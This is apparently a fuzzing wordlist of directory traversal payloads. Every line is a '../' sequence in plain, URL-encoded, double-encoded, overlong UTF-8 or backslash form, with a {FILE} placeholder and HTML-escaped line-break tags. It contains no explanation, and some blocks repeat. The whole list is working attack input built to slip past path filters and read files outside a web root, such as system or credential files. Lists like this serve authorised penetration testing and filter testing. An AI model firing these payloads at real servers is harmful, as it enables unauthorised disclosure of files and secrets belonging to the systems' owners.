..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
